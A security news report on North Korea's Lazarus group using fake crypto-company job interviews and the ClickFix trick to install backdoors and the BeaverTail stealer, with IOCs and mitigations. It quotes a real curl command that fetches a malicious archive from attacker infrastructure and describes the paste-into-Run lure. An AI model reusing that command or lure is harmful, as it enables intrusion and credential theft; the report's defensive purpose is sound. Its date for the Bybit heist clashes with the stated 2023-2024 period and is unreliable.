Lazarus Weaponizes Fake Job Interviews With ClickFix Malware

North Korea's Lazarus group has added the ClickFix social engineering technique to its arsenal, using fraudulent job interviews at fake cryptocurrency companies to trick victims into installing malware. Security researchers at Qi'anxin documented the campaign, which they track as "ClickFake Interview."

The attack combines Lazarus's established fake recruitment infrastructure with the ClickFix technique that has become a dominant initial access method over the past year. Victims think they're troubleshooting a camera issue during a job interview. They're actually executing commands that install a backdoor.

How the Attack Works

The campaign targets employees at centralized finance (CeFi) organizations, impersonating companies like Coinbase, KuCoin, and Kraken. Victims receive enticing job offers that direct them to attacker-controlled interview websites.

During the simulated interview, the malicious site claims the victim's camera configuration is malfunctioning. The "solution" appears to be a legitimate Nvidia software update. What actually happens:

1. Malicious JavaScript copies a PowerShell command to the victim's clipboard
2. The site instructs victims to press Windows+R and paste a "verification code"
3. The pasted command downloads ClickFix-1.bat from attacker infrastructure
4. The batch script fetches and extracts a malicious archive disguised as Nvidia drivers

The batch file executes this download sequence:

curl -k -o "%TEMP%\nvidiaRelease.zip" https://driverservices.store/visiodrive/nvidiaRelease.zip

From there, the infection chain branches based on the target's operating system. Windows 11 systems get a specific backdoor (drvUpdate.exe), while a cross-platform JavaScript stealer (BeaverTail) runs on all platforms.

Malware Components

The attack deploys multiple payloads:

drvUpdate.exe - A backdoor targeting Windows 11 systems (build 22000+) that connects to 103.231.75.101:8888. It supports command execution via cmd.exe, file read/write operations, and system reconnaissance. The malware achieves persistence through registry modification of startup keys.

BeaverTail - A cross-platform information stealer delivered via main.js that requires Node.js. It communicates with a secondary C2 at 45.159.248.110 and targets browser credentials, cryptocurrency wallet data, and system information.

GolangGhost - A Go-based backdoor that provides file download/upload capabilities, shell command execution, a Chrome credential stealer, and system information harvesting.

Why Lazarus Keeps Targeting Crypto

Lazarus has made cryptocurrency theft a core revenue stream for the North Korean regime. The group stole roughly $2 billion in virtual assets during 2023-2024, including the $1.5 billion Bybit heist in March 2025.

Fake job interviews work particularly well against crypto companies because:

• The industry has high turnover and aggressive recruiting
• Remote work is normalized, making video interviews the default
• Technical staff expect to troubleshoot software during onboarding
• Cryptocurrency employees often have direct access to wallet infrastructure

The ClickFix addition makes these attacks more effective. Rather than sending malicious attachments that security tools might catch, Lazarus manipulates victims into executing commands themselves—bypassing many automated defenses. Iran's APT42 ran a parallel campaign targeting WhatsApp and Gmail accounts in the Middle East, showing that social engineering remains the go-to vector for state-backed groups.

Detection and Defense

Organizations can identify this campaign through several indicators:

Network IOCs:

• C2 server: 103.231.75.101:8888 (drvUpdate.exe)
• C2 server: 45.159.248.110 (BeaverTail)
• Download domain: driverservices.store

File Hashes (MD5):

• ClickFix-1.bat: a4e58b91531d199f268c5ea02c7bf456
• nvidiaRelease.zip: f9e18687a38e968811b93351e9fca089
• run.vbs: 3ef7717c8bcb26396fc50ed92e812d13
• main.js (BeaverTail): b52e105bd040bda6639e958f7d9e3090
• drvUpdate.exe: 6175efd148a89ca61b6835c77acc7a8d

Behavioral Indicators:

• PowerShell execution following clipboard paste operations
• Registry modifications to Run keys by unsigned executables
• Node.js processes spawned from temporary directories
• Outbound connections to non-standard ports from driver-named executables

Recommended Mitigations

1. Train employees on ClickFix attacks - Staff should understand that legitimate software never asks users to paste commands into Run dialogs
2. Block known IOCs - Add the C2 IPs and download domain to network blocklists
3. Monitor for suspicious execution chains - Alert on curl/PowerShell downloading archives to temp directories
4. Implement application allowlisting - Prevent execution of unsigned binaries from user-writable locations
5. Verify job postings independently - Contact companies through official channels rather than links in unsolicited messages

The combination of social engineering and technical deception demonstrates why security awareness training remains essential. Lazarus doesn't need zero-days when psychological manipulation works this well. Mobile device compromises at scale are a growing concern too—the FBI tracked BadBox 2.0 malware on over a million Android devices. China's Mustang Panda is also evolving, deploying CoolClient backdoor with browser-based info stealing capabilities for targeted espionage.